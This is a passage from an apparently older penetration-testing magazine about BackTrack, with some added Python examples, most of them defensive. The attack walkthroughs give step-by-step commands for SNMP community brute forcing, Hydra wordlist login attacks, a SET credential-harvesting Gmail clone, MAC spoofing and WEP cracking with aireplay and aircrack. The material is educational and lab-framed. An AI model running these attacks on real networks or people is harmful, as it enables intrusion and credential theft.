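        try:
            data = c.recv(1024)
        except socket.timeout:
            data = b""           # silent service: open port, no banner
    return data.decode(errors="replace").strip()


def port_is_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Lowest-layer test from the text: does a TCP handshake complete?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:              # connection refused, unreachable, timed out
        return False


def demo() -> dict:
    """Run the exchanges against local listeners and return what each side saw."""
    port = free_port()
    path = os.path.join(tempfile.mkdtemp(), "file.txt")
    result = {"open_before": port_is_open("127.0.0.1", port)}   # nothing listens yet

    t = start_listener(port, path, banner=b"220 demo-ftp ready\r\n")  # constructed banner
    result["banner"] = grab_banner("127.0.0.1", port)
    t.join(5)

    t = start_listener(port, path)                 # nc -lvp port > file.txt
    send_text("127.0.0.1", port, "This text will be transmitted using Netcat")
    t.join(5)
    with open(path, "rb") as f:
        result["received"] = f.read().decode()

    result["open_after"] = port_is_open("127.0.0.1", port)     # listener is gone again
    return result


if __name__ == "__main__":
    print(demo())
```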
Let's first explore some other programs with fewer possibilities, but which work as well. Start using netdiscover to find live hosts. With netdiscover -P a network scan is started using the common LAN address range (the one you are connected to) (see Figure 2). Netdiscover can also be used on another network interface (-i) and IP range (-r). The -P option gives a cleaner output. Netdiscover is a continuous scanning tool: it scans the net over and over in order to find new hosts, and it could be used to implement a very simple intrusion detection system. To stop the scan you have to use [CTRL+C]. In a similar way you can use fping with the option -g to analyze a range of IPs. Note that fping uses the ICMP protocol, whereas netdiscover uses the ARP protocol to locate network hosts, so this is a good double check. Don't forget to write down everything and keep track of everything; in particular, start to compile a list of live hosts. You can also try to give a DNS name to the hosts you find using smbscan, but you will notice that the program can find only a few, those with a NetBIOS name enabled.

Let's now try to find something more using DNS discovery. If you are in a domain, or if you are scanning for DNS names on the Web, you can try to operate a DNS zone transfer and capture DNS records. When you can perform this operation, you get other sensitive information and maybe hosts not previously discovered. The DNS zone transfer is a query that synchronizes primary and secondary DNS servers but, if administrators misconfigure them, everyone can query for a transfer and get all the DNS records. DNSenum is a tool that tries to make a zone transfer and catch the results. The basic operation is quite simple: you just have to set the domain name to target. Note that you can try the zone transfer both on a local domain (see Figure 3) and on an Internet domain (see Figure 4).

Figure 1. Netcat simple chat

Figure 2. Netdiscover at work
You have to notice that a DNS zone transfer, even if successfully done, does not give hackers direct access to the servers, but it gives them a lot of information that can be useful to expand the attack surface. Look at Figure 4: the DNS zone transfer highlights at least 3 attack vectors: webmail, ftp, sftp. It is therefore essential to block all the attacks and scans you can. ARP and ICMP scans must also be stopped in a protected LAN. Unfortunately this isn't always practicable: in a Microsoft domain, for example, some administrative system tools do not work with restrictive local firewall policies. It is not easy to find a balance between security and efficiency. You have done a good host analysis and you have a list of IPs alive in the network. Now you can start user account identification.
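The ARP/ICMP double check and the live-hosts list from the paragraphs above, as an added example that is not the article's code: it parses output from netdiscover -P and fping -g, merges the two into hosts.txt, and flags hosts that only one method saw. The sample output is constructed to mimic the tools' formats, which can differ slightly between versions.

```python
"""Added example (not from the article): merge netdiscover (ARP) and fping (ICMP)
results into one live-hosts list and flag the hosts only one method found.
The two sample outputs are constructed; real column layouts vary by version."""
import ipaddress
import re

# Constructed sample of `netdiscover -P` output (ARP replies on the local segment).
NETDISCOVER_SAMPLE = """\
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.34.1    00:11:22:33:44:01      1      60  Example Router Inc.
 192.168.34.10   00:11:22:33:44:0a      3     180  Example NIC Corp.
 192.168.34.25   00:11:22:33:44:19      1      60  Unknown vendor
"""

# Constructed sample of `fping -g 192.168.34.0/24` output (ICMP echo).
FPING_SAMPLE = """\
192.168.34.1 is alive
192.168.34.10 is alive
192.168.34.40 is alive
192.168.34.2 is unreachable
ICMP Host Unreachable from 192.168.34.7 for ICMP Echo sent to 192.168.34.7
"""

IP_MAC = re.compile(r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-fA-F:]{17})\b")
FPING_ALIVE = re.compile(r"^(\d+\.\d+\.\d+\.\d+) is alive$")


def parse_netdiscover(text: str) -> dict:
    """Map IP -> MAC for every host that answered ARP; header lines are skipped."""
    hosts = {}
    for line in text.splitlines():
        m = IP_MAC.match(line)
        if m:
            hosts[m.group(1)] = m.group(2).lower()
    return hosts


def parse_fping(text: str) -> set:
    """Set of IPs that answered an ICMP echo; 'unreachable' lines are ignored."""
    alive = set()
    for line in text.splitlines():
        m = FPING_ALIVE.match(line.strip())
        if m:
            alive.add(m.group(1))
    return alive


def merge_live_hosts(arp_hosts: dict, icmp_alive: set) -> list:
    """One row per host, noting which method saw it; a host that answers ARP but
    not ping usually has a host firewall dropping ICMP, which is worth noting."""
    rows = []
    for ip in sorted(set(arp_hosts) | icmp_alive, key=ipaddress.ip_address):
        by_arp, by_icmp = ip in arp_hosts, ip in icmp_alive
        if by_arp and by_icmp:
            seen = "arp+icmp"
        elif by_arp:
            seen = "arp-only (answers ARP but not ICMP echo: host firewall likely drops ping)"
        else:
            seen = "icmp-only (no ARP reply: beyond this segment, or missed by netdiscover)"
        rows.append({"ip": ip, "mac": arp_hosts.get(ip, ""), "seen": seen})
    return rows


def hosts_txt(rows: list) -> str:
    """The plain hosts.txt the article later feeds to onesixtyone and Nmap."""
    return "\n".join(r["ip"] for r in rows) + "\n"


if __name__ == "__main__":
    merged = merge_live_hosts(parse_netdiscover(NETDISCOVER_SAMPLE), parse_fping(FPING_SAMPLE))
    for r in merged:
        print(f"{r['ip']:<16}{r['mac']:<20}{r['seen']}")
    print(hosts_txt(merged), end="")
```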

Figure 3. DNS zone transfer on a local domain using host command

Figure 4. DNSenum on a Web domain

Find your account

As for hosts, user discovery can be done using many methods. You can scan Google searching for email accounts of your target company, explore corporate Web pages looking at PDF or Word documents and who the creators of these documents are; if you have access to the LAN you are testing, you can try to get information from the SNMP or SMTP protocols. Below are some scripts and programs present in BT that will help you.

theHarvester, by Edge-Security Research, is a very useful one; you will find it in the folder /pentest/enumeration/theharvest. It searches for a company name in various resource databases (Google, LinkedIn, PGP, Bing) and can be used to extract probable usernames. In Figure 5 you can see the result of a search: maybe vdiaz, cdelojo, cmartorella, and xmendez are also FTP, SSH or RDP users. From the same authors you can use metagoofil (/pentest/enumeration/google/metagoofil/) to try to find the users who created documents downloadable from the domain you point at, such as docs or PDFs. As well as using Web searches to catch company users' names/usernames, you can try to obtain information via SNMP or SMTP. SNMP is a protocol based on UDP that is often used to monitor server service status. The authentication tokens (community strings) are passed in the clear and often have the default value (public or private), so you can easily try to find them in order to get a lot of information. You can use programs such as Snmpenum and Onesixtyone for this. Let's see how they work. Initially you have to use Onesixtyone to enumerate community strings; with the info collected before, make a list of hosts and write it to a file (/tmp/hosts.txt), then go to /pentest/enumeration/snmp/onesixtyone and do the following:
./onesixtyone -c dict.txt -i /tmp/hosts.txt -o /tmp/log.txt

In this command you use a file, dict.txt, already present in the onesixtyone folder, to 'brute force' the community strings; you use the hosts file you built before to set the targets and, at the end, you write a log file. In Figure 6 you can find a sample of what you can get: some printers, some switches and a server. Go on and run snmpenum against that server, setting 'public' as the community string and using the windows.txt template (already present) to merge the output information (see Figure 7). This is just a sample, but you can get much more information than this using SNMP: running processes, open ports, system information and much more. For now, limit yourself to the users. What you want is to create a document like hosts.txt but with possible user names.

There are many other methods to identify users, such as using the SMTP server (smtpscan) and testing the VRFY functionality (smtp-user-enum). Spidering a target website to collect unique words (/pentest/password/cewl) or sniffing network traffic (Wireshark) can also be useful. In the BackTrack > Information Gathering > Network analysis menu you can find many tools to reach your target. Try to find as many names as you can, but do not forget to add the most common user names (root, admin, administrator) to your list.

Map the NET

Let's have a look at network scanners, limiting ourselves to a simple scan with the only objective of finding some services that can be used as a target. Please keep in mind that scanners can do much more than what you will read here. Of course, NC can be used as a network scanner, but the best programs are Unicornscan and Nmap, so let's start with the first one. The commands in Figure 8 perform a simple scan pointing at a single target, testing common TCP (-m T) and UDP (-m U) ports, typically those used by common services such as FTP, SSH, SMB, MySQL. The last command in Figure 8 is a scan of the whole 192.168.34.* subnet, but only on the FTP, SSH, SMB, and RDP ports. You can do the same thing using Nmap. The command nmap followed by the target scans the common TCP ports; if you add the -sU option it will scan UDP ports. The single target can be replaced with 192.168.34.*, or with your hosts.txt, to explore the whole subnet or specific IPs; adding the option -p 21-23,3389 you will limit the scan to ports 21, 22, 23 and 3389. The result will probably be the same, but with Nmap you will see more information. In addition, it can quickly be told to determine what kind of program is listening on a discovered port (-sV) and what operating system is installed (-O). Please take a look at the Nmap help to learn more options, and remember that the man command and the tools' own help are always your friends. If you are afraid of the Terminal, use the Nmap GUI: Zenmap. Remember that every GUI is at least one layer above its command-line program; anyway, let's use the graphic interface of Nmap and try to find FTP, SSH, Telnet and RDP services in the subnet (Figure 9). Scan so as to make a list of hosts offering FTP, another one of hosts offering RDP, and so on. Well done! You have completed your basic network gathering phase; now you can merge all your lists and launch your first attack. What do you need? A username list, a file listing hosts with the specific service, a password list, and a program to put everything together.

Figure 5. Maybe we have found some accounts

Figure 6. Onesixtyone log

Figure 7. Snmpenum at work
You don't have the password list, but one can easily be found in the folder /pentest/password/wordlist/ or by a search on the Web. The kind of attack you will do is called a 'wordlist attack': it is not the most elegant way to perform a penetration test, but it may be very effective. The program you can use to join your lists is Hydra (or its GUI, xHydra). Figure 10 explains how it works. Open the Hydra GUI (Privilege Escalation > Password Attacks > Online Attacks > Hydra-gtk) and, in the Target tab, insert the target list (e.g. FTP_hosts.txt), the port to test and the protocol (21 / FTP). The options 'Show attempts' and 'Be verbose' are useful to better understand what the program does. Go to the Password tab and insert the user and password lists; don't forget to check 'try login as password' and 'try empty password'. For a basic test don't use the Tuning and Specific tabs; move to the Start tab and run the attack. It takes a while, but I hope you can find some user and password associations.

Get the keys

Figure 8. Some basic scans using Unicornscan

Figure 9. Nmap GUI

Figure 10. Operation diagram of THC Hydra

You can also try to extend your lists to have more chances, but remember that such an attack may take a very long time. In a pen test you must have a very strong reason to spend 8 or more hours on a wordlist attack. Anyway, if you find some associations, write them down and be ready to reuse them: users tend to use the same password for more than one service. You can start to write a file with user:password pairs; you will use it in Hydra, in the Password tab, instead of the user and password lists. When you discover a new service, you can first use Hydra with the new file and then with the user and password lists. This will speed up your work. I hope you now have a user/password to access FTP, SMB or, if you are lucky, SSH or RDP. This is not the end of the test, this is the beginning. You will use this access to gain more information and to find more vulnerabilities all over the LAN. But what if you can't find anything? Don't worry, these are just the first arrows in your quiver. After these, you can try many other things such as web vectors, exploiting some vulnerability, or ARP poisoning. There are so many options that the only limit is you, and every discovery is the start for the next one. So when you open a new port, restart from the beginning: restart from sharpening your axe.
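From the defender's side, a wordlist attack like the Hydra run described above leaves an unmistakable trace in authentication logs: a burst of failures from one source, across several user names and services, sometimes followed by a success. As an added example that is not from the article, a small detector over constructed syslog-style OpenSSH and vsftpd lines (the exact formats vary by version, so the patterns are assumptions):

```python
"""Added example (not from the article): spot a Hydra-style wordlist attack in
authentication logs. Its trace is a burst of failed logins from one source,
typically across several user names and services, sometimes followed by a
success. The lines below are constructed syslog-style samples modelled on
OpenSSH and vsftpd messages; real formats vary by version and distribution."""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
Jun  3 10:00:01 ftp1 sshd[2101]: Failed password for admin from 192.168.34.66 port 50001 ssh2
Jun  3 10:00:02 ftp1 sshd[2102]: Failed password for invalid user test from 192.168.34.66 port 50002 ssh2
Jun  3 10:00:02 ftp1 sshd[2103]: Failed password for root from 192.168.34.66 port 50003 ssh2
Jun  3 10:00:03 ftp1 sshd[2104]: Failed password for admin from 192.168.34.66 port 50004 ssh2
Jun  3 10:00:03 ftp1 sshd[2105]: Failed password for root from 192.168.34.66 port 50005 ssh2
Jun  3 10:00:04 ftp1 sshd[2106]: Accepted password for admin from 192.168.34.66 port 50006 ssh2
Jun  3 10:00:10 ftp1 vsftpd[3001]: [ftpuser] FAIL LOGIN: Client "192.168.34.66"
Jun  3 10:00:11 ftp1 vsftpd[3002]: [anonymous] FAIL LOGIN: Client "192.168.34.66"
Jun  3 10:05:00 ftp1 sshd[2200]: Failed password for davide from 192.168.34.12 port 40001 ssh2
Jun  3 10:20:00 ftp1 sshd[2201]: Failed password for davide from 192.168.34.12 port 40002 ssh2
"""

# syslog prefix: month, day, time, then the host name
TS = r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ "
PATTERNS = (  # (regex, service, was the login successful?)
    (re.compile(TS + r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"), "ssh", False),
    (re.compile(TS + r"sshd\[\d+\]: Accepted password for (?P<user>\S+) from (?P<ip>\S+)"), "ssh", True),
    (re.compile(TS + r'vsftpd\[\d+\]: \[(?P<user>[^\]]+)\] FAIL LOGIN: Client "(?P<ip>[^"]+)"'), "ftp", False),
)


def parse_events(text: str, year: int = 2013) -> list:
    """Turn log lines into {ts, ip, user, service, ok}; syslog omits the year, so it is supplied."""
    events = []
    for line in text.splitlines():
        for pattern, service, ok in PATTERNS:
            m = pattern.match(line)
            if m:
                ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
                events.append({"ts": ts, "ip": m["ip"], "user": m["user"], "service": service, "ok": ok})
                break
    return events


def detect_wordlist_attacks(events: list, threshold: int = 5, window_s: int = 60) -> dict:
    """Flag sources with at least `threshold` failed logins inside any window of
    `window_s` seconds. Returns {ip: summary}; a clean log returns {}."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if not e["ok"]]
        for i, first in enumerate(fails):
            burst = [e for e in fails[i:] if (e["ts"] - first["ts"]).total_seconds() <= window_s]
            if len(burst) < threshold:
                continue
            alerts[ip] = {
                "failures": len(burst),
                "users": sorted({e["user"] for e in burst}),
                "services": sorted({e["service"] for e in burst}),
                # a success after the burst began means one of the guessed pairs worked
                "success_after": any(e["ok"] and e["ts"] >= first["ts"] for e in evs),
            }
            break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_wordlist_attacks(parse_events(SAMPLE_LOG)).items():
        print(ip, info)
```

The two failures from 192.168.34.12 fifteen minutes apart stay below the threshold, so only the 192.168.34.66 burst is reported, together with the fact that a login succeeded right after it.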

Davide Peruzzi, OSCP certified, is a system administrator and freelance security consultant with about 10 years of experience in Information Technology. In the last years he focused on vulnerability assessments, penetration testing, InfoSec, and NetSec. He can be reached at [email protected]


Pentesting with BackTrack
Penetration testing, also known as pentest, is a technique to evaluate the security of computers and networks by simulating attacks from external and internal threats. The pentesting process involves static and dynamic analysis of a system or network in order to reveal potential security issues resulting from improper configurations or hardware/software flaws. These attacks should be executed from the point of view of potential attackers.
During this process, if security issues come to the foreground, pentesters try to exploit them. Successful penetration results are presented to the system owners with recommendations to plug the loophole and all the operations needed to reproduce the attack.

Warning

Please consider that all materials in this PenTest magazine issue are intended for educational purposes only. You must not use the skills and information obtained from this reading to attack in any way a system for which you don't have specific authorization or ownership. Reproducing the experiments presented in this article on non-authorized systems is illegal in most of the world and you will ultimately bear the consequences, including very high fines and jail.



Quick overview of BackTrack

In the testing/penetration community, a leader emerges: BackTrack. Since its first release on the 5th of February 2005 by Mati Aharoni, Devon Kearns and Offensive Security, BackTrack has become a large, stable, and well-known distribution for penetration testing. BackTrack is a Debian GNU/Linux based distribution built for specific purposes: digital forensics and penetration testing.

BackTrack comes from the merger of two other distributions, WHAX and Auditor Security Collection, which were already focused on penetration testing. The latest release of BackTrack was published in August 2012 and is named BackTrack 5 R3. Here's a non-exhaustive list of BackTrack tool categories:
• Information gathering;
• Vulnerability assessment;
• Exploitation tools;
• Privilege escalation;
• Maintaining access;
• Reverse engineering;
• RFID tools;
• Stress testing;
• Forensics;
• Reporting tools;
• Services;
• Miscellaneous.

Installation and Configuration

In order to follow our step-by-step tutorials and hands-on recipes, you must have access to three different virtual machines: one with BackTrack, one with Windows 7 and, later, one with Windows XP. We assume that you have a brand new installation of BackTrack. If not, you can download the latest version from the BackTrack website. In order to be comfortable, you'll need to create a partition of at least 16 GB. At the end of the installation BackTrack will reboot and you'll be able to log in as the root user (bt login: root / Password: toor). A prompt will appear and, in order to launch the GUI, type startx. If you want to try this experiment by yourself, you'll need to purchase Windows 7. Here is a piece of advice: use a hypervisor like VirtualBox, because it's easier to install an OS and it saves you from creating a native partition on your computer; you will gain some precious time! In my case, I run the two OSes on the same laptop using Oracle VirtualBox (see Figure 1). After the installation we must set up the network parameters, because the machines must communicate with each other through the network. For Windows, just click on the two little screens on the container of the operating system (in the bottom right corner). Then click on 'Network Adapters' and set up the adapter as 'Bridge Adapter' rather than 'NAT'. In my case, the name of the bridge adapter is 'en0: Ethernet' because I use this device to be able to contact the other machine (and the Internet). Repeat this step for BackTrack (see Figure 2). Now it's time to check whether the two machines can see each other: launch a terminal on the two VMs and execute the command ipconfig on Windows and ifconfig on BackTrack. Note: you must probably restart the networking daemon, otherwise the new configuration won't take effect:

/etc/init.d/networking restart

Figure 1. Windows 7 and BackTrack 5r3 side by side

Figure 2. Network configuration of Windows 7 and BackTrack 5

Figure 3. Ping command in BT terminal

You will see the IP address of each VM. Then execute a ping command on BackTrack using the IP address of the Windows VM (see Figure 3). In my case the Windows VM has the address shown in Figure 3, but it will be different for you.

Figure 4. Social Engineering tool

A ping is a special network packet, an ICMP echo request: it sends an echo packet and waits for an echo reply.

Social Engineering Toolkit

In this part we want to show how to use the Social Engineering Toolkit. First, to recap what social engineering attacks are: it is the art of manipulating people into performing actions or divulging confidential information. The Social Engineering Toolkit (SET) appeared in BackTrack 4 and was written by David Kennedy. SET is an open-source Python tool aimed at penetration testing around social engineering. You can find more information about SET on its home page.


In this case we use SET to create a fake website to harvest credentials.
• Run the Social Engineering Toolkit using the BackTrack menu (see Figure 4).
• Make sure that Metasploit and SET are up to date using options 4 and 5 in the SET terminal menu.
• Select number 1, 'Social Engineering Attacks'.
• Select Website Attack Vectors (see Figure 5).
• In the first part we use the Credential Harvester Attack Method (option 3).
• At this moment SET offers three options: use a predefined template such as Facebook, Gmail, etc., clone an existing site, or import a custom HTML file. We use the first option to make the tutorial easier to follow.
• Now we have the choice to specify a local IP address or an external IP address. In this tutorial we use a local address (to know your IP address, use the ifconfig command in a terminal; see Figure 6).
• Select Gmail in the next menu and press Enter.
• Now open Firefox at localhost:80 (see Figure 7).
• When you use the form to authenticate the user on Gmail, you can see all the information about the user in the SET terminal (see Figure 8).
• The process generated two reports, HTML and XML files, in /pentest/exploits/set/reports/ (see Figure 9).

Figure 5. Website Attack vector

Figure 6. Know your IP address
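The harvester page built in the steps above is reached over plain http at a local IP and posts the typed credentials back to that address; those are the signs a user, or a browser-side check, can spot before entering a password. As an added example that is not part of the article or of SET, a few such heuristics over a constructed stand-in for the cloned form (the page URL 192.0.2.10 and the genuine host mail.example.com are placeholders):

```python
"""Added example (not SET's code): client-side heuristics that flag the page a
credential harvester serves. The harvester clones a real login page but is
reached over plain http, usually at a bare IP such as the BackTrack VM's, and
its form posts back to that same address. The HTML below is a constructed
stand-in for such a clone; mail.example.com stands for the genuine login host."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample: a stripped-down copy of a webmail login form.
CLONED_LOGIN = """<html><head><title>Webmail sign in</title></head><body>
<form method="post" action="index.html">
  <input type="email" name="Email">
  <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form></body></html>"""


class FormFinder(HTMLParser):
    """Collect every <form> with its action, method and number of password fields."""

    def __init__(self) -> None:
        super().__init__()
        self.forms = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "",
                         "method": (a.get("method") or "get").lower(),
                         "password_fields": 0}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            if (a.get("type") or "").lower() == "password":
                self._cur["password_fields"] += 1

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


def is_ip_literal(host: str) -> bool:
    """True for '192.0.2.10' or '::1', False for a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def assess_login_page(page_url: str, html: str, expected_host: str) -> list:
    """Return the red flags to notice before typing a password into this page;
    an empty list means none of the harvester's tell-tale signs were found."""
    findings = []
    page = urlparse(page_url)
    host = page.hostname or ""
    if page.scheme != "https":
        findings.append("page is served over plain http")
    if is_ip_literal(host):
        findings.append("page is reached by a bare IP address, not a hostname")
    if host != expected_host:
        findings.append(f"host {host!r} is not the expected {expected_host!r}")
    finder = FormFinder()
    finder.feed(html)
    for form in finder.forms:
        if form["password_fields"] == 0:
            continue                              # not a login form
        target = urlparse(urljoin(page_url, form["action"]))
        if target.scheme != "https":
            findings.append("password form submits over plain http")
        if (target.hostname or "") != expected_host:
            findings.append(f"password form posts to {target.hostname!r}, not {expected_host!r}")
        if form["method"] != "post":
            findings.append("password form uses GET, so credentials would land in URLs and logs")
    return findings


if __name__ == "__main__":
    for flag in assess_login_page("http://192.0.2.10/", CLONED_LOGIN, "mail.example.com"):
        print("-", flag)
```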

How to protect against social engineering?

This type of attack is generally used by a hacker via email. To prevent social engineering attacks, it's really important to teach people about phishing, using HTTPS, unmasking spam, and verifying the identity of the speaker.

Wireless and Bluetooth

Wireless WEP 802.11 Security

To test the security of your wireless network, we need the aircrack-ng package (formerly aircrack). This package exists for Windows and Linux and you can find it on the project's website. BackTrack is more specialized in security, and the package is included together with all the drivers for Wi-Fi cards. Aircrack is software to crack WEP 802.11 keys. It uses the attack named Fluhrer-Mantin-Shamir (FMS) and other attacks created by KoreK. When enough packets are captured, Aircrack can instantly find the wireless key. The aircrack package contains several programs; the three main ones are:
• Airodump-ng: software that captures packets, scans the networks, and keeps the packets that we use to recover the key.
• Aireplay-ng: the main function of this software is sending packets to stimulate the network and capture more packets.
• Aircrack-ng: used for cracking the key; it uses the packets captured through airodump-ng.
For confidentiality, the names of all networks (ESSID, Extended Service Set Identifier) were hidden. Also the MAC address BSSID (Basic Service Set Identifier) has been partially censored.
• Start by checking whether your wireless card is able to inject packets: http://www.aircrack-ng.org/doku.php?id=compatible_cards

Figure 7. Gmail at localhost:80

Figure 8. Information about the user

Figure 9. Reports

Figure 10. Airmon-ng

• Open the terminal and use the command airmon-ng to list the cards available (see Figure 10).
• The MAC address is the ID of your wireless card. When a hacker attacks a wireless network he usually changes it, to hide his identity. First we disable the wireless card, and then we change our MAC address with the macchanger command (see Figure 11). Normally you work on your own network and this step is not really important, but it's important to understand the technique.
• Now we use airodump-ng wlan0 to scan the networks. Airodump scans all the channels and shows all the APs (Access Points) available (see Figure 12). The PWR column corresponds to the signal power; if airodump has a problem determining it, it displays '-1'. The Beacon column corresponds to a frame transmitted periodically to announce the presence of a wireless LAN; it is not important for cracking a WEP key. The column 'CH' indicates the channel of the AP. The column '#Data' is the key to cracking WEP wireless security. The principle of using Aircrack to crack the WEP key is catching initialization vectors (IVs). IVs can be found during the exchange of data. The conclusion is simply: more data = more IVs exchanged = simpler to crack a WEP key.
• Use CTRL+C to stop scanning.
• For the best performance, and to scan only the target network, use the next command to filter on its BSSID (see Figure 13):
airodump-ng -c (channel) -w (filename) --bssid (BSSID) (interface)

Where:
• channel corresponds to the target channel;
• filename is the name of your trace file;
• BSSID corresponds to the target BSSID;
• interface is your interface.
• This step is not essential: it tests whether the access point has a MAC address filter, but the check is not reliable, so if you get an error message or a timeout, don't panic. Open a new tab in the terminal console and enter this command (see Figure 14):
aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 -e (ESSID) (interface)

Where:
• BSSID corresponds to the target BSSID;
• ESSID corresponds to the target ESSID;
• interface is your interface.
• Now we want to inject traffic to increase the data on the network and make WEP cracking easier. We must have 100 000 IVs to crack the WEP key, and the best attack to generate IVs is the 'ARP request re-injection attack', specified with the number 3. Hit the following command to force some traffic (see Figure 15):
aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0

Where:
• BSSID corresponds to the target BSSID.
After this command, normally the number of #Data in your first command line increases step by step.
• Finally, to crack the wireless network key we open a new terminal and we use this command to start aircrack-ng:

aircrack-ng -b (BSSID) (filename-01.cap)

Where:
• BSSID corresponds to the target BSSID;
• filename-01.cap is the name specified during step 6, followed by -01.cap; it corresponds to the first trace file. Aircrack keeps updating the number of IVs captured by airodump and generated by aireplay.
• After a few minutes, the WEP key should appear by itself if the crack works (see Figure 16). The network has changed the key, but you should know it because you are the AP owner. The captured file is corrupted.

Figure 11. Change your MAC address

Figure 12. Airodump

Figure 13. Airodump

Figure 14. Aireplay command

Figure 15. Aireplay

Figure 16. Key found

How to protect against Wi-Fi penetration?

To prevent this kind of attack you can change your wireless key encryption to WPA2 encryption. If this does not cause accessibility problems, use a complex password (numerals, letters, uppercase letters, symbols) to increase the cracking complexity.

INTRODUCTION TO BACKTRACK
• BackTrack for Pentesting? By Lloyd Wilke
BUILDING YOUR LAB
• From The Beginning: Building an SQLi Lab By Guglielmo Scaiola
• How to Set Up a Software Hacking Lab Part 1, 2, 3 By Steven Wierckx
MULTIPHASE TESTING
• Sharpen your Axe with BackTrack By Davide Peruzzi
• Multiphase Penetration Testing: Using BackTrack Linux, Metasploit and Armitage By Lance Cleghorn
• BackTrack 4: Target Scoping By Shakeel Ali, Tedi Heriyanto
TOOLS
• Metasploit Primer By George Karpouzas
• Metasploit for Exploits Development: The Tools Inside the Framework By Guglielmo Scaiola
• Hacking Wireless in 2013 By Terrance Stachowski
• Automating Exploitation with MSFCLI By Justin Hutchens
• Nikto: How to Launch Mutation Technique By Ankhorus
• MsfPayload & MsfEncode By Pankaj Moolrajani and Hitesh Choudhary
• Compromising Passwords With the Next Generation of Backtrack: Kali Linux By Joseph Muniz
• PenTempest on Wordpress By Massimiliano Sembiante
SCENARIOS
• Pentesting with Backtrack By Mathieu Nayrolles, Mathieu Schmitt, and Benoît Delorme
• Guide to BackTrack 5: Attacking the Client By Vivek Ramachandran
• Taking Over an Active Directory By Gilad Ofir
• MS Internet Explorer Sam ID Property Remote Code Execution Vulnerability By Praveen Parihar

Bluetooth security

There are various hacks and a lot of software already available on different websites which help hackers to hack any cell phone and multimedia phone with Bluetooth. But actually a lot of manufacturers have closed the security vulnerabilities. In this article we have outlined only some Bluetooth hacking software and presented how to set it up.
• The first time we set up our Bluetooth equipment, we open a terminal and type this command:

hciconfig hci0 up

Where: hci0 corresponds to your Bluetooth interface.
• Now you should have your adapter up and working. To verify that all is 'OK' hit this command: hciconfig -a (Figure 17).
• Now we want to scan and fingerprint a Bluetooth device. Fingerprinting is a term we use for profiling a device, and to do this BackTrack has a collection of tools called BlueZ. BlueZ is the standard Bluetooth package for Linux. In this part we use hcitool to scan devices that are broadcasting. We scan using hcitool with the following command (see Figure 18):

hcitool scan

• Stop scanning when it shows your device and note its MAC address. Now we use sdptool to browse our device for open channels and tell us what services are available on which channels (see Figure 19).

sdptool browse Mac_address

Where: Mac_address is your mobile MAC address.
• Now we search our HCI daemon configuration file (generally in /etc/bluetooth/hcid.conf) and replace all the lines with those from Listing 1.

Listing 1. HCI daemon configuration file
autoinit yes;
passkey "1234";
security auto;
name "bt1";
iscan enable;
pscan enable;
lm accept,master;
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;

• We restart our Bluetooth device with bash /etc/rc.d/rc.bluetooth restart
• We can now set up our devices. The first one is RFCOMM0 and is on channel 3 (DUN, dial-up), the second is RFCOMM1 and is on channel 6 (FTP), and the third is RFCOMM2 and is on channel 7 (OBEX push).

mknod -m 666 /dev/rfcomm0 c 216 3
mknod -m 666 /dev/rfcomm1 c 216 6
mknod -m 666 /dev/rfcomm2 c 216 7

• It's time to connect them with sdptool (see Figure 20).

sdptool add --channel=3 DUN
sdptool add --channel=7 OPUSH
sdptool add --channel=6 FTP

At this point we have scanned for Bluetooth broadcasts, identified the channels/services, and configured our network card. Normally you are ready to attack your mobile. In this article, as we have previously said, we do not present attacks because our device is not vulnerable. But if you would like to know more about it, you can search for the Bluebugger and Bluesnarfer attacks.

Figure 17. hciconfig -a

Figure 18. hcitool scan

Figure 19. sdptool

Figure 20. sdptool

Prevent Website Attacks

Scanning Joomla CMS with Joomscan

Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. The principle is simple: you download the archive from the official Joomla website and, after the installation, your website is set up and you can start publishing content (follow the documentation to learn how to install Joomla: http://). To show how important it is to keep a CMS up-to-date, we deliberately use an old version of Joomla (download Joomla_1.5.26). In this case, we have hosted an Apache server and MySQL using LAMP; Joomla is available on our local network at . On the other side, we use the latest version of BackTrack 5 R3 to scan Joomla 1.5.26 for vulnerabilities.

• Start BackTrack.
• Open the joomscan tools (you will find them in the BackTrack menu; see Figure 21).
• To run the joomscan script, use this command (see Figure 22):

./ –u (String)

Figure 21. CMS Vulnerability

Where: STRING corresponds to the URL of our Joomla website. In this example the website is placed at .

• After a few seconds, we can see the Apache and Joomla versions detected by joomscan and all the modules included in the website. As we can see, the reported version is not the exact one; here it is the range 1.5.12-1.5.14. This mismatch is explained by the technique joomscan uses to detect the version: it reads the header of the .ini file included in Joomla, which is sometimes not up-to-date. However, the analysis can help you understand security in the CMS world.
• After a few minutes, joomscan has checked all known vulnerabilities against your website and tells us whether our version is affected (see Figure 23).
• Now we can follow the 'Exploit' instructions to run an exploit against our Joomla website.
• If you would like to prevent attacks on your Joomla website, you can run this command: ./joomscan.pl defense and follow the instructions to make your CMS more secure.

Figure 22. Running Joomscan

How to protect against Joomla vulnerabilities?

The best technique to prevent attacks on a CMS is to keep your version up-to-date and to run joomscan again whenever you install a new module.

SQL injection with sqlmap
